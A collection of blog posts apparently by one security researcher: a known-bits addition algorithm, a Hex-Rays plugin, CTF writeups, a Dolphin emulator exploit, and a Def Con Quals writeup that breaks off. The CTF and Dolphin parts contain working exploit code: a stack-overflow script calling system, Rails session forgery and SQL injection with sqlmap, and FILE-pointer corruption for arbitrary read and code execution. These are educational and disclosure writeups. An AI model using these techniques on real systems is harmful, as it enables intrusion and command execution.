Bit-Twiddling: Addition with Unknown Bits

(If you can’t read the code in this post on mobile, try this wrapped version instead, sorry)

Suppose you have two values. You know some bits are zero, some bits are one, other bits could be either. You can add together those two values to get another such partially-known value, determining as precisely as possible which bits can be known and which cannot. This operation is common in optimising compilers and program analysis, and it has some interesting properties that I’ll circle back to, but first here’s my implementation of the addition operation described above:

  struct known_bits {
    unsigned ones;
    unsigned unknowns;

  struct known_bits kb_add(struct known_bits a,
                           struct known_bits b) {
    struct known_bits result;
    unsigned x = a.ones + b.ones;
    result.unknowns = a.unknowns | b.unknowns |
                      (x ^ (x + a.unknowns + b.unknowns));
    result.ones = x & ~result.unknowns;
    return result;

This function compiles to about 12 instructions, the assembly for which fits in a tweet. But let’s look at the theory behind it all.


A perhaps surprising amount of thought went into that simple-looking structure.

Each partially known value is a ternary number (with digits zero, one and unknown), so for a 32-bit number, there are 332 possible values. This requires more than one 32-bit value to represent, but can be comfortably represented with two or three 32-bit values. Initially, I stored “known ones” and “mask”, where the mask was set for all known bits. After figuring out most of my functions, I realised I could remove a significant number of bitwise nots by storing the unknown bits instead of known bits.

I could also store a third value, “known zeroes”, but this can be calculated if needed by the expression ~(v.ones | v.unknowns), and it seemed error prone to make the representation more redundant.


But that’s enough about code – let’s get back to some maths. Each value can be thought of as a lossy representation of a set of possible numbers. The size of this set is given by 2popcount(unknowns) (meaning if there are no unknown bits it represents a single value, or if there are two unknown bits it represents four possible values).

The representation is lossy. It would take 232 bits to represent an arbitrary subset of the 32-bit integers, and I’m only storing 64 bits. For example, consider the set {000, 011}. This is represented as 0UU (maximising for precision), which represents the superset {000, 001, 010, 011}.

In some sense, the most fundamental operation is the “union” operation:

   r.ones = a.ones & b.ones;
   r.unknowns = a.unknowns | b.unknowns | (a.ones ^ b.ones);

This combines two sets, such that only bits which are known to be the same are known in the result.

The other fundamental operation is iteration. This is done by iterating over values up to the set size (2popcount(unknowns)), and distributing those bits to the unknown bit locations. This can be written efficiently using a technique described in Fabian Giesen’s Texture tiling and swizzling.

Using these two operations, we can define an algorithm for computing the maximally precise known bits after any operation. As a pseudocode example:

  r = known_value(op(a.ones, b.ones))
  for each possible a as A
    for each possible b as B
      r = union(r, known_value(op(A, B)))

This has an exponential runtime, so it’s entirely impractical, but I quite like it as a mathematical definition of the best possible result, and it can be useful for quickly testing better algorithms.

Some Bitwise Operations

Bitwise operations have relatively simple definitions. A nice example is or:

  r.ones = a.ones | b.ones;
  r.unknowns = (a.unknowns | b.unknowns) & ~r.ones;

Any known ones in either input will be known ones in the output, known zeroes in both inputs will give a known zero output, and anything else is unknown. For example: 00011U | 0U1U1U = 0U111U.

Another example is xor.

  r.unknowns = a.unknowns | b.unknowns;
  r.ones = (a.ones ^ b.ones) & ~r.unknowns;

Any unknowns in either input will be unknown, but any two known values are xored. For example: 00011U ^ 0U1U1U = 0U1U0U.

It’s worth remembering that xor is basically addition without the carry.

Addition Operation

Coming back to addition, there are a few things worth noting. Firstly, our addition is not associative, for example:

  (0001 + 0001) + 000U = 0010 + 000U = 001U
  0001 + (0001 + 000U) = 0001 + 00UU = 0UUU

The addition algorithm shown above comes from a few logical ideas. Firstly, any unknown bit in either input will be unknown in the output (because it can change the result bit in the same location). Secondly, some carry bits may also become unknown, possibly a whole run of them. These unknown bits can be determined by finding difference between the maximum possible sum and the minimum possible sum.

The minimum value in a given set is a.ones and the maximum is a.ones | a.unknowns. So the initial algorithm was:

  struct known_bits kb_add(struct known_bits a,
                           struct known_bits b) {
    struct known_bits result;
    result.unknowns = a.unknowns | b.unknowns |
                      ((a.ones + b.ones) ^ ((a.ones | a.unknowns) +
                                            (b.ones | b.unknowns));
    result.ones = (a.ones + b.ones) & ~result.unknowns;
    return result;

Alternately, the maximum can be represented as (a.ones + a.unknowns) because no bits are set in both a.ones and a.unknowns, so the addition will never carry. This representation allows the following transformation to the function above:

    (a.ones | a.unknowns) + (b.ones | b.unknowns)
  = (a.ones + a.unknowns) + (b.ones + b.unknowns)
  = (a.ones + b.ones) + a.unknowns + b.unknowns

The (a.ones + b.ones) expression now appears in three places, so we calculate it ahead of time to simplify things, giving the function shown at the top.


Can you prove or disprove the addition function? I can’t find a counter-example when exhaustively searching 8-bit values, but that’s not really a proof.

Can you compute the known-bits for multiplication? It’s easy to start getting useful results, but I would love to see a maximally precise less-than-exponential-time algorithm. Can it be proven that that’s impossible?

Can it be simplified further? John Regehr has had interesting results in program synthesis along these lines (which is what reminded me to post this – thanks!)

Update: if you want to play with implementing different operations, I’ve put some test code in a gist, based on a gist by @zwegner. It includes an implementation of subtraction.

Writing a Hex-Rays Plugin: VMX Intrinsics

I’ve been very excited to work with the new Hex-Rays Decompiler microcode API, and I’ve finally had the chance to sit down and build a useful plugin. This post describes the development process: the things I tried that didn’t work and the weird hacks that ultimately did.

The plugin (C++ code) is available on Github at

Example output

Without the plugin:


With the plugin:


Original source for reference:

 uint64_t update_rip(uint64_t new_rip) {
   uint64_t old_rip;
   __vmx_vmread(GUEST_RIP, &old_rip);
   if (__vmx_vmwrite(GUEST_RIP, new_rip) != 0)
     return 0;
   return old_rip;

Hex-Rays API

The Hex-Rays API consists of a single header file, hexrays.hpp, which is the primary source of documentation, as well as a collection of examples, which are very useful.

Adding new intrinsics is similar to example 8 (hexrays_udc.cpp, not published online), but the assumes the call takes arguments in fixed registers, whereas intrinsics generally take their arguments from the instruction’s operands. This presented a significant challenge, as I could not rely on the udc_filter_t infrastructure to generate helper calls.

Dumping microcode

The hexrays_sample9.cpp example shows how to dump microcode. By dumping microcode at different maturity, you can see how the decompiler is generating, optimizing and simplifying code. This was my most useful tool. I found examples of intrinsics already being generated, dumped the generated microcode, and wrote code to produce roughly the same microcode for other instructions.

There is one big problem with this, though. The code to display the microcode as a string is not public, so I had a hard time understanding how the human read-able representation mapped to the underlying C++ structures I had to generate. I modified the example code with a lot of one-time print debugging to dump out the structures, alongside the string representations, so I could see what was going on.

Defining instructions

Unhandled instructions show up as __asm blocks in the decompiler output, but are represented by the ext opcode in the microcode. I originally tried writing an optinsn_t handler to translate ext instructions to helper calls (based on the Hex Blog post Deobfuscating xor’ed strings). This worked, but the _RDX style register names were still present and were not propagated into the call arguments, which undermined a lot of the purpose. I assume this information is tracked separately.

Instead I used a microcode_filter_t. During a apply(codegen_t& cdg) callback, I add new opcodes to the codegen_t‘s “mblock_t mb member, which allows generating arbitrary microcode for instructions.

Temporary registers

The __vmx_vmwrite intrinsic (and most others), return 0, 1, or 2, to represent the combination of flags indicating the status of the operation (see __vmx_vmwrite on MSDN for more information). As such, I wanted to move the result to a temporary register, and set the flags based on that value:

mov call !__vmx_vmwrite<fast:"size_t" r9.8,"size_t" rax.8>.1, tt.1
setz tt.1, #1.1, zf.1
setz tt.1, #2.1, cf.1

The tt register is a temporary used by the Hex-Rays x86-64 microcode emitter, but I couldn’t find a way to access it in the API. I ended up using the mop_t::dstr function to get the string representation of every register, then hardcoded the resulting value:

const mreg_t mr_tt = mreg_t(0xC0);

This is presumably a very fragile approach – let me know if you can recommend a better alternative.


I originally had no problems with my intrinsic call being optimized away, but as soon as I moved it into the tt register, the pre-optimizer pass (and I think other passes) started deleting calls if the result was unused (even though the FCI_NOSIDE flag was not set). To work around this I chose to make my intrinsics appear to spoil memory.

Again, I couldn’t figure out how to spoil GLBLOW and GLBHIGH, so I ended up hardcoding GLBLOW based on dumping values from another instruction, which the debug-printer showed as spoiling it.

There are quite a few functions defined in the hexrays.hpp header that do not link (although I expect this will be fixed soon), and mlist_t::add(const ivl_t &) was one of them, so I had to add it to the mlist_t‘s underlying ivlset_t directly:

ivl_t glblow(0, 0x100000);

Taking the address of registers

The __vmx_vmread intrinsic takes an output pointer as the second parameter. But the instruction can write its output to a register. Hex-Rays provides an operand type (mop_a/mop_addr_t) which should work for this but I had aliasing problems which I couldn’t figure out. (Writing to “rax” then using “al” would appear as two different variables for some reason.)

Instead, I chose to generate a __vmread which writes the result value to the destination register or memory, and to simply undefine the cf and zf flags (using m_und). This means that if the return value is used, references to undefined variables will show up in Hex-Rays with comments (at the top of the function) showing them to map to cf and zf. But in the common case where the return value is ignored the resulting pseudocode is nicer (and correct). 

Accessing operands

x86-64 operands can be fairly complex. The Hex-Rays API provides an abstraction for this in the form of the function mreg_t codegen_t::load_operand(int opnum), which can load an operand to a microcode register from an assembly register. However, it cannot store an operand, nor can it get the address of an operand.

To avoid re-implementing full operand decoding, I call load_operand then mutate the output to either store, instead of load, or to get the address instead of accessing memory. This is not a solid choice, and there may be some edge cases where this causes real problems, but due to the way temporary registers are used by the microcode generator it should be work for the expected operand types.

Future work

Currently, when we decompile “return __vmx_vmwrite(…);” we end up with the confusing (but correct):

v1 = __vmx_vmwrite(...);
return (v1 == 2) + (v1 == 2) + (v1 == 1);

Fixing this should be possible, since we know “v1” is either 0, 1, or 2, but it’s not clear how best to do it. Possibly this is a good case for an optinsn_t callback.

There are a few TODOs in the code. A few of the types aren’t currently correct, but not in ways that should cause problems, and it would be good to have an option to generate the correct __vmx_vmread (as discussed in “taking the address of registers” above).

I also hope to make the plugin more solid in the future, if I can find safer ways to do some of the things described above.

Final notes

A huge thanks to everyone at Hex-Rays for releasing this. I love being able to understand the internals of the decompiler and to develop plugins to make reverse engineering easier in various situations.

All in all, this seems to work, but given the hacks described above it isn’t likely to be 100% solid. Hopefully future revisions of the Hex-Rays API will improve the documentation, add more examples, and possibly provide higher-level interfaces to make plugins like this easier.

The same technique can be used to change the code generation for a wide variety of instructions, and to help with all sorts of problems. You can add new intrinsics for almost anything, or modify existing ones, such as rewriting __readgsqword(0x188) calls to KeGetCurrentThread(). There are a lot of useful possibilities. I hope my example code is helpful, and I hope that others writing Hex-Rays plugins will take the time to release example code.

The code can be found at and you can find me on Twitter at @dougallj.

Quick Writeups from Teaser CONFidence CTF 2017

Over the weekend I played the Teaser CONFidence (Dragon Sector) CTF with 9447. These are my writeups on all the challenges I solved, for the benefit of the rest of my team. Perhaps also of interest to the challenge authors and other participants, but definitely not the most interesting writeups.

Fastcalc (Pwning, 500)

I was pretty happy to get “first blood” on this challenge, but unfortunately solving a challenge quickly often means solving it without a thorough understanding, so it’s not going to be a brilliant writeup.

This was a 32-bit Windows challenge which provided a simple calculator.

I started reversing in IDA. It had a conspicuous call to system(“echo Fastcalc…”) near the top of the function, surrounded by normal IO functions (probably C++, but could be C – I didn’t pay too much attention). So I had some idea of where I’d end up jumping, and that I should be trying to get eip control. The code also, somewhat strangely, uses fibers to transfer control flow. Fortunately I’d recently learnt about them elsewhere, and they had very little to do with my solution to the challenge itself.

The code allowed construction of “new” expressions, followed by execution of expressions. The parser accepted only doubles, the usual four arithmetic operators (+ – * /) and parentheses, and had some notion of precedence. I believe the parser essentially converted from the usual infix form represented by characters (“1+2*3”) to a postfix form stored in structures in memory (“1 2 3 * +”).

I reversed the structures, and the function that output them, as follows:

struct ParseNode
 double double_or_byte;
 _DWORD is_operator_byte;
 _DWORD padding;

struct ParseNodes
 _DWORD num_nodes;
 _DWORD padding;
 ParseNode nodes[256];
void __cdecl append_double_or_byte(int a1, char a2, double a3, ParseNodes *a4)
 a4->nodes[a4->num_nodes].is_operator_byte = a1;
 if ( a1 )
   LOBYTE(a4->nodes[a4->num_nodes].double_or_byte) = a2;
   a4->nodes[a4->num_nodes].double_or_byte = a3;

I noticed that this does not do any kind of overflow checking, and this structure is allocated on the stack of the wmain function. So I had a look at some of the following values in memory and formed a theory that I could get it to write a pointer into a double and leak it back to me as the result of an expression (e.g. 0+0+0+0+0+0…).

I tried this, and overflowed the stack a bit, but when I ran the expression it just dumped out a lot of stack memory as the expression name. I had no idea why, and I solved the challenge without knowing. (But I now propose it was caused by corrupting an std::string structure, which can have inline data or dynamically allocated data. It probably didn’t corrupt the length, but changed what I presume is the “capacity” field so that the string looked inline for its data. I get to std::strings in a minute.)

I later figured out a way to make my original idea work too, but it was much less useful than the stack leak, so I forgot about it.

I noticed the stack had a cookie, which meant it was unlikely that we could get eip control that way, and wasted a bit of time trying to reason about what was on the stack that I could poke. It amounted to mostly a bunch of strings, and not much of interest, so I went back to the “stack overflow” approach, hoping that it would be possible due to the uninitialised gaps often left in the 16-byte structures I was overflowing.

I initially tried to skew the postfix tree so that it would be all controlled values followed by all operators “0+(0+(0+(0+0)))” -> “0 0 0 0 0 + + + +”, but quickly found that that wrote past the bottom of the stack and crashed, so I switched to an approach where I did “0+0+0+0+0” until I got past the end of the main buffer, then switched to the contiguous doubles at the end of the sequence.

This worked but produced a bunch of useless crashes long before returning from the function, apparently freeing some std::string structures. I reversed a bit and figured that if I sprayed a value less than 0x10 it wouldn’t try to free the memory, so I changed to spray with the double value that was encoded as 0F 00 00 00 0F 00 00 00, which ended up with eip = 0xF. Awesome!

I switched to using more interesting values and discovered a problem where the low bits of my doubles were getting corrupted. To my surprise this was caused by rounding in pythons str implementation. Switching to repr fixed it. Lesson learned.

The stack layout meant that I controlled one more DWORD (the other half of a double) on the stack after the return address. If I returned directly to the system function, that would be interpreted as the return address (from system), but by returning to the instruction “call system” it gets treated as the argument – a pointer to a string.

So now I just needed to get string data in memory. However the code was reading from user input it didn’t allow spaces, so the command “type flag.txt” wasn’t going to work. I discovered that “type,flag.txt” could work, and proceeded to foolishly load it into the stack frame of main, and pass a pointer to it to system. This doesn’t work, because we’ve already returned from main, so system‘s stack frame corrupted its own argument. The only other things on the stack I could easily control were doubles, but they were only 8 bytes long. In the end I packed the command “type f*” into a double and it worked. Yay!

The somewhat abbreviated, although no less terrible, code:

def get_nested_thing(image_base, stack_leak):
  dwords = [
    15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15,
    15, 15, 15,
    image_base + 0x3055,
    stack_leak - 36,
    struct.unpack('I', 'type')[0],
    struct.unpack('I', ' f*\0')[0],
    15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]
  values = []
  for i in range(0, len(dwords), 2):
                struct.pack('II', dwords[i], dwords[i+1]))[0]))
  global values_index
  values_index = 0
  def next_value():
    global values_index
    v = values[values_index]
    values_index += 1
    return v
  def nested(x):
    if x == 0:
      return next_value()+'+'+next_value()
    return next_value()+'+(' + nested(x-1) + ')'
  return nested(15)

read_until('Operation: ')
read_until('expression: ')
send(128*'000+' +  '(0+0)\n')
read_until('Operation: ')
read_until('Expression ')
leak = read_until(': still running.')[:-len(': still running.')]
leak = leak[:len(leak)-len(leak)%4]

values = struct.unpack('I' * (len(leak)/4), leak)
text_leak = values[12]
assert (text_leak & 0xFFFF) == 0x3483
image_base = text_leak - 0x13483

read_until('Operation: ')
read_until('expression: ')
raw_input('press enter:')
send('0+'*126 + get_nested_thing(image_base, values[15]) + '\n')
while 1:
  if 'runtime error' in read_until('Operation: '): break
  read_until('Expression ')

read_until('expression: ')
read_until('Operation: ')

derailed (Web, 300)

Derailed was a Ruby on Rails web challenge in the form of a note taking app. I registered an account, logged in, and the first thing I noticed viewing source was that images were embedded using base64 URLs, which seemed a bit odd. The next thing I noticed was that these images came from URLs in the markdown, so the code:


would appear as a base64 encoded image. I tried file:/// URLs, which didn’t work. I tried to get it to send an HTTP request to a server I controlled, which did work, but didn’t lead anywhere. I considered setting up FTP or SMB servers to see if it would send me credentials (which was a solution to a CTF challenge I failed to complete many years ago), but didn’t. Eventually I tried just /etc/passwd which worked.

The passwd file listed the home directory of the derailed user, and I found an example rails app on GitHub and used that to guess some URLs and pull down some of the source files.

I also found the rails secret key in /proc/self/environ and used that to make sessions impersonating other users in the hopes that a key was stored as user zero or one. In hindsight I should have seen that this was a dead end, but after successfully writing a ruby script to make fraudulent cookies, and iterating over every possible user I didn’t find the key, just lots of other contestants notes.

I went to dinner, and tried to think of alternate approaches to suggest to my team mates, or paths we hadn’t searched yet. I figured I had some time to kill, so I tried auditing for other bugs and stumbled upon this code:

def index
  @notes = current_user.notes.order(order)
def order
  order = params[:order]
  if order =~ /^(created_at|updated_at|title)$/

I’m really not familiar with Ruby, but I knew that using regex for validation isn’t foolproof, and I’d done SQL injection through an ORM at my day job years ago, so I tried bypassing it by appending “%0a” to the parameter, which worked. I still wasn’t sure if it was injectable, but I figured out that “%0a-” would crash but “%0a–” wouldn’t, and assumed it truly was SQL injection.

I had a nice dinner with friends.

On the train ride home I got back to it, this time using sqlmap (I’m lazy, and it’s pretty good). It was a tricky injection, so I figured out how to do blind queries myself, then specified the injection point manually: -u '

(sorry about the confusing wrapping)

As you can see I initially didn’t escape the ‘*’ in count(*) causing some injection point confusion, but after that (and a ton of other fiddling with random options I didn’t really understand) I got it to recognise the blind AND based injection.

On the train ride home I got it to dump the table names and column names and asked it to dump the most interesting one:

Database: public
Table: fl4g
[1 entry]
| F1A6    |

But it just gave up because of 500 errors, and I had to get off the train and walk home. On my walk I reasoned that it might be because the column name looks like hexadecimal, and if I could only quote it it might work. When I got home I verified this (using the extremely verbose setting on sqlmap to get the URLs and modify them by hand), and wrote a tamper script to do it for me (surprisingly easily):

from lib.core.enums import PRIORITY
def tamper(payload, **kwargs):
  retVal = payload.replace('F1A6', 'fl4g."F1A6"')
  return retVal

I wrote just over half of one of those lines, the rest are from the manual/template. The final flags were “–dbms=postgres –dump -T fl4g -D public –threads=4 –tamper=quote” (because I called my script And it gave me the flag.

INDEX (Forensics, 400)

I wasn’t going to write this up. No offence to the creator, but I just really like pwning a lot more than sifting through haystacks. I wasted hours trying to find tools to parse the filesystem and dump the metadata, specifically the catalog, because of the cryptic poem:

I'm a collector and I've always been misunderstood
I like the things that people always seem to overlook
I gather up and catalog it in a book I wrote
There's so much now that I forget if I don't make a note

I started reading the HFS specification, and an HFS parser espes had written.

In the end, I pieced together the two parts of a Mach-O by looking at where they started and stopped in a hex editor. I loaded it in IDA and read the code. I found the XOR key, and knew exactly what file was meant by inode 19 due to all the previous investigations and dodgy tools I’d installed in virtual machines. I XOR’d the right bytes with the other right bytes and got the key.

Exploiting Dolphin

Dolphin is a Wii emulator, and a consistent source of interesting technical problems. In the interests of learning more about Dolphin, Wii, PowerPC, and exploitation, I discovered a handful of bugs, and created an ISO file that can run arbitrary code on the host, portably and reliably. This has been an interest of mine since I spent some time exploiting a partial GameCube emulator in the last Defcon CTF finals, and I decided to actually explore it following a tweet from a Dolphin developer.

To be clear, Dolphin is not a sandbox, and is not designed to be secure. You should not use it to emulate software from untrusted sources. Piracy is a very good way to get yourself hacked. If you run something in Dolphin you should understand that it can do anything on your computer. These bugs will be fixed, but there will be plenty of other bugs in the future.

These issues are not “vulnerabilities”, it’s just a collection of interesting tricks that allow games running on Dolphin to execute arbitrary code. I do call it “exploitation”, because the same techniques can work on software which actually has security requirements.

Anyway, enough disclaimers, let’s dig in. In this post, I’ll show how to make a 100% reliable exploit for Dolphin on macOS, which is portable to every version containing a single, simple bug.


Enough three-letter initialisms? Let’s start with some definitions. (I’ve included links to the WiiBrew wiki, which was a valuable source.)

IOS is the operating system that the Wii provides to games running on it. It runs on a separate ARM coprocessor in the Wii. This provides a variety of services, for example allowing games to read and write files, and communicate over the network.

IPC stands for inter-processor communication, and is the means by which the PowerPC processor running the game code communicates with IOS. This is implemented using a number of memory-mapped I/O registers.

HLE stands for high-level emulation. Instead of requiring a copy of IOS to be fully emulated, Dolphin provides high-level (C++) implementations of all the functionality that IOS usually provides to games.

This provides a considerable attack surface, and is where I began my search for interesting bugs. After a little exploring, I came across the following code (abbreviated):

CWII_IPC_HLE_Device_sdio_slot0::IOCtl(u32 _CommandAddress)
  u32 Cmd = Memory::Read_U32(_CommandAddress + 0xC);
  u32 BufferIn = Memory::Read_U32(_CommandAddress + 0x10);
  u32 BufferOut = Memory::Read_U32(_CommandAddress + 0x18);
  switch (Cmd)
    u32 reg = Memory::Read_U32(BufferIn);

    if (reg >= 0x200)
      WARN_LOG(WII_IPC_SD, "IOCTL_READHCR out of range");

    u32 val = m_Registers[reg];
    INFO_LOG(WII_IPC_SD, "IOCTL_READHCR 0x%08x - 0x%08x", reg, val);

    // Just reading the register
    Memory::Write_U32(val, BufferOut);
  // ...
  // ...

This code looks great, it’s bounds checked and everything. The catch, of course, is in the definition:

class CWII_IPC_HLE_Device_sdio_slot0 : public IWII_IPC_HLE_Device
  // ...
  u32 m_Status;
  u32 m_BlockLength;
  u32 m_BusWidth;

  u32 m_Registers[0x200 / 4];

  File::IOFile m_Card;
  // ...

The classic byte/word mixup allows reading from anywhere up to index 511 in a 128 element array. Better still, there’s a IOCTL_WRITEHCR implemented in the same method with the same bug, allowing memory corruption. (To my surprise, this bug was introduced by respected exploit writer comex in September 2013.)

It took me a lot of work to create an ISO file that reproduce this bug, using only Python, PyCrypto, and a PowerPC toolchain, and I learned a lot of interesting lessons. But after thoroughly reinventing a number of wheels, the proof-of-concept was only a few lines:

  int slot0 = open("/dev/sdio/slot0", MODE_RW);

  // overwrite the low 32-bits of the File::IOFile
  u32 input[5] = {129, 0, 0, 0, 0x41414141};
  ioctl(fd, IOCTL_WRITEHCR, &input, sizeof input, 0, 0);

  // crash by attempting to read from the File::IOFile
  u8 out[8];
  slot0_read_multiple_block(fd, &out, 0, sizeof (out));

ASLR in Dolphin

Dolphin avoids randomised addresses in several places for a variety of reasons. In recent versions, the binary is loaded at a fixed location below 0x80000000 (2GB) so that certain x86 instructions emitted by the JIT can access it. The drawback of using this memory is that it can change significantly every time the program is recompiled or the source changes. But this technique is very useful if we know the exact version we’re exploiting and don’t need to be portable.

Also on macOS and Linux, the virtual memory of the emulated console is mapped at a fixed address (0x2300000000). This is part of the “fastmem” optimisation, where Dolphin uses a 16GB range of the 64-bit address space to represent memory in the same layout as is seen by the 32-bit processor in the Wii. (This is an oversimplification, but it’s close enough for our purposes.)

#ifdef _WIN32
 // 64 bit
 u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE);
 VirtualFree(base, 0, MEM_RELEASE);
 return base;
 // Very precarious - mmap cannot return an error when trying to map already used pages.
 // This makes the Windows approach above unusable on Linux, so we will simply pray...
 return reinterpret_cast<u8*>(0x2300000000ULL);

This is nice and predictable for attacks which required arbitrary data at a known location. On Windows there’s no deliberate randomisation, but it’s not 100% predictable (due to some other factors), so we can’t write a 100% reliable exploit this way.

Even with full ASLR, the bug described in the previous section allows us to leak some data from the heap, potentially bypassing ASLR. But for now I’ll focus on using the fastmem region at 0x2300000000 to exploit macOS.

Corrupting an IOFile

Now we have two options, corrupt the following member of the structure (the IOFile), or corrupt the following heap data. There’s a lot more heap data to chose from, but as the CWII_IPC_HLE_Device_sdio_slot0 class is allocated only once during initialisation, we don’t have much control over the following data, and it will be different on different platforms, and change randomly on some platforms, so the IOFile is a much more appealing option.

It has only has two members we can corrupt:

class IOFile : public NonCopyable
// ...
  std::FILE* m_file;
  bool m_good;

It turns out there’s exactly one pointer we can overwrite. At first glance this seems hard to exploit, but it turns out that the FILE structure is responsible for managing input and output buffers, and is extremely amenable to building an arbitrary memory read/write primitive.

Let’s take a look at how the IOFile is used by slot0 (abbreviated again):

u32 CWII_IPC_HLE_Device_sdio_slot0::ExecuteCommand(u32 _BufferIn, u32 _BufferInSize,
                                                   u32 _rwBuffer, u32 _rwBufferSize,
                                                   u32 _BufferOut, u32 _BufferOutSize)
  // The game will send us a SendCMD with this information. To be able to read and write
  // to a file we need to prepare a 0x10 byte output buffer as response.
  struct Request req = Memory::ReadRequest(_BufferIn);
  u32 ret = RET_OK;
  switch (req.command)
  // ...
    if (m_Card)
      u32 size = req.bsize * req.blocks;
      if (!m_Card.Seek(req.arg, SEEK_SET))
        ERROR_LOG(WII_IPC_SD, "Seek failed WTF");
      if (m_Card.ReadBytes(Memory::GetPointer(req.addr), size))
        DEBUG_LOG(WII_IPC_SD, "Outbuffer size %i got %i", _rwBufferSize, size);
        ERROR_LOG(WII_IPC_SD, "Read Failed - error: %i, eof: %i",
          ferror(m_Card.GetHandle()), feof(m_Card.GetHandle()));
        ret = RET_FAIL;
    Memory::Write_U32(0x900, _BufferOut);
  // ...

The Seek and ReadBytes translate pretty much directly to fread and fseek, which are part of the C standard library, implemented by Libc on macOS. You can download the source from

The FILE structure is pretty complicated, but there are a few things to note. First, there are function pointers, which we could use to get control of RIP. However, we don’t know any fixed address that’s safe to call, so we must also note the flags, which we can use to prevent the function pointers from being used, while constructing an arbitrary read.

The following is the (again abbreviated) structure definition:

typedef struct __sFILE {
 unsigned char *_p; /* current position in (some) buffer */
 int _r; /* read space left for getc() */
 int _w; /* write space left for putc() */
 short _flags; /* flags, below; this FILE is free if 0 */
 short _file; /* fileno, if Unix descriptor, else -1 */
 struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */

 /* operations */
 void *_cookie; /* cookie passed to io functions */
 int (*_close)(void *);
 int (*_read) (void *, char *, int);
 fpos_t (*_seek) (void *, fpos_t, int);
 int (*_write)(void *, const char *, int);

 /* separate buffer for long sequences of ungetc() */
 struct __sFILEX *_extra; /* additions to FILE to not break ABI */
 fpos_t _offset; /* current lseek offset (see WARNING) */

#define __SRD 0x0004 /* OK to read */
#define __SWR 0x0008 /* OK to write */
#define __SRW 0x0010 /* open for reading & writing */
#define __SOPT 0x0400 /* do fseek() optimisation */
#define __SOFF 0x1000 /* set iff _offset is in fact correct */

Let’s perform an arbitrary read. First, we need to make sure we hit the “fseek() optimisation” path that doesn’t call the _seek function pointer, and then have enough data available in the buffer that it doesn’t need to call the _read function pointer. We can do this as follows:

  • Set the __SOPT and __SOFF flags to avoid calling seek.
  • Set the _seek function pointer to non-NULL to allow seeking.
  • Set the __SRD flag to allow reading.
  • Make the _offset and _r fields are greater than the read size.
  • Make the _p and _bf._base fields point to the source location for the read.
  • The _extra pointer must point to valid memory, for the lock.

All in all the function ends up looking like this:

static void slot0_osx_read(int fd, void *out, u64 hostaddr, u32 size) {
 osx_FILE file;
 memset(&file, 0, sizeof file);

 osx_FILEX extra;
 memset(&extra, 0, sizeof extra);

 file._extra = address_to_host(&extra);

 file._flags = OSX_SOPT | OSX_SOFF | OSX_SRD;
 file._seek = 1; // non-null

 file._p = hostaddr;
 file._bf._base = hostaddr;

 file._offset = size + 1;
 file._r = size + 1;

 // replace the FILE* to point to our data
 u64 saved_fileptr = slot0_read_fileptr(fd);

 slot0_write_fileptr(fd, address_to_host(&file));

 slot0_read_multiple_block(fd, out, 0, size);

 // restore
 slot0_write_fileptr(fd, saved_fileptr);

There’s an interesting problem of endian that I haven’t mentioned. Because the PowerPC architecture our code is running on is big-endian, and the x86 architecture Dolphin is running on is little-endian, we need to swap every field in the structure. I borrowed a trick from LLVM, which uses C++ operator overloading to transparently do endian conversions, so the code above is correct – it’s just that the fields are declared as host_u32 and host_ptr types in the structure definition, not int and unsigned char * as in the Libc source code.

Finding System

We’ll finish the exploit by calling system, but first we have to find it. system is a function in libc, so we can start by finding libc. Fortunately, we know where the original FILE object is (because we can leak it using the out of bounds read), and so we can read out the pointers to the true implementation of the _read function, which is within Libc.

We can then search backwards from this point to find the Mach-O header (marked by the magic number 0xFEEDFACF at the start of a page). And finally, we just need to do exactly what dyld does, parse the Mach-O header, find the export trie and lookup the string _system. Fortunately you can find the source at, which makes things a bit easier, but it still takes quite a lot of code.

The implementation is shown in the code linked below.

Running code

Now we just need to call system. We’ve gone to great lengths to avoid calling _seek, but it’s actually a really good technique, because _seek is called with _cookie as the first argument:

ret = (*fp->_seek)(fp->_cookie, offset, whence);

So now we know where system is, we can invoke it with an arbitrary string as follows:

file._cookie = address_to_host("open -a Calculator");
file._seek = system_ptr;
file._flags = 0;
slot0_write_fileptr(slot0, address_to_host(&file));
slot0_read_multiple_block(slot0, &ignored, 0x1234, sizeof ignored);
slot0_write_fileptr(slot0, saved_fileptr);

When Dolphin attempts the read, it will call system and the shell command will run.

After all this the runtime is stable, so it could easily be patched into a pirated game. (Don’t pirate software, even emulated software. With Dolphin, and most other emulators, you’d be taking exactly the same risk as pirating native games, which is just a terrible idea.)

Final Notes

This exploit works on Dolphin 3.5-2313 through to Dolphin 5.0-1296 on OS X (I didn’t test them all, but a pretty representative sample). It hopefully illustrates how carefully choosing corruption targets and techniques can lead to very reliable and portable exploits.

There are a lot of things I didn’t cover, but I hope it gave some insight into Dolphin, and macOS’s C library implementation.

The full code for the macOS exploit is on – if you have any questions, let me know. The hard part is arguably setting up the build environment and generating a Wii disc, but there are plenty of other resources that can help with that.

The patches for the other bugs I disclosed are in PR #4447. Thanks to JosJuice for fixing the bugs quickly.

Def Con Quals 2016 – Easier [Pwnable]

Easier has the dubious honor of being the most frustrating CTF challenge I have completed to date. It was the second hardest challenge in the CTF, according to the dynamic scoring system LegitBS used. (And the hardest problem that my team, 9447, solved.)

The challenge presented a fairly opaque interface, sending the user four random numbers on start up, and accepting four numbers in return. I reversed this pretty extensively in IDA and WinDbg, figuring out that it was performing modular exponentiation and finding all the parameters, only to figure out that the result is completely ignored as long as all your response values are greater than 1 (otherwise it exits).

So, a lot of time wasted, but now we get to it reading more input. It would read two numbers from the user perform a cryptographic-looking operation on them. I reversed this to the following C code:

    void do_input(unsigned *buffer, unsigned count) {
        for (unsigned i = 0; i < count; i++) {
        unsigned lookup[4] = {1, 2, 3, 4};
        for (unsigned i = 0; i < count; i += 2) {
            unsigned value = 0x7CBF26C0;
            unsigned v1 = buffer[i];
            unsigned v2 = buffer[i+1];
            for (unsigned j = 0; j < 64; j++) {
                 v2 -= (value + lookup[(value >> 11) & 3]) ^
                      (v1 + ((v1 << 4) ^ (v1 >> 5)));
                value += 0x160D0365;
                v1 -= (value + lookup[value         & 3]) ^
                      (v2 + ((v2 << 4) ^ (v2 >> 5)));
            buffer[i] = v1;
            buffer[i+1] = v2;

